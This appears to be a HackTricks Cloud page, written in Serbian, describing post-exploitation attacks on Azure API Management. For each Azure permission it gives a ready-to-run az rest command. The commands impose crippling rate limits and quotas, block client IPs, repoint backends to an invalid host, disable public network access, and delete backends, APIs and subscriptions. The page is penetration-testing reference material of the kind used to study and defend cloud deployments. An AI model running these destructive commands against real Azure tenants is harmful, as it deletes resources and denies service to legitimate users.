Files
hacktricks-cloud/src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md

4.0 KiB

Azure - API Management Post-Exploitation

{{#include ../../../banners/hacktricks-training.md}}

Microsoft.ApiManagement/service/apis/policies/write or Microsoft.ApiManagement/service/policies/write

Napadač može iskoristiti više vektora da prouzrokuje denial of service. Da bi blokirao legitimni saobraćaj, napadač dodaje rate-limiting i quota politike sa ekstremno niskim vrednostima, čime se efektivno onemogućava normalan pristup:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'

Da bi blokirao određene legitimne klijentske IP adrese, napadač može dodati politike filtriranja IP-a koje odbacuju zahteve sa odabranih adresa:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'

Microsoft.ApiManagement/service/backends/write or Microsoft.ApiManagement/service/backends/delete

Da bi prouzrokovao neuspeh zahteva, napadač može izmeniti konfiguraciju backend-a i promeniti njegov URL u nevažeću ili nedostupnu adresu:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://invalid-backend-that-does-not-exist.com",
"protocol": "http"
}
}'

Ili obrišite backends:

az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "If-Match=*"

Microsoft.ApiManagement/service/apis/delete

Da bi učinio kritične APIs nedostupnim, napadač ih može direktno izbrisati iz API Management service:

az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
--headers "If-Match=*"

Microsoft.ApiManagement/service/write or Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action

Da bi blokirao pristup sa Interneta, napadač može onemogućiti javni pristup mreži na API Management service:

az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Disabled"
}
}'

Microsoft.ApiManagement/service/subscriptions/delete

Da bi blokirao pristup legitimnim korisnicima, napadač može obrisati API Management subscriptions:

az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
--headers "If-Match=*"

{{#include ../../../banners/hacktricks-training.md}}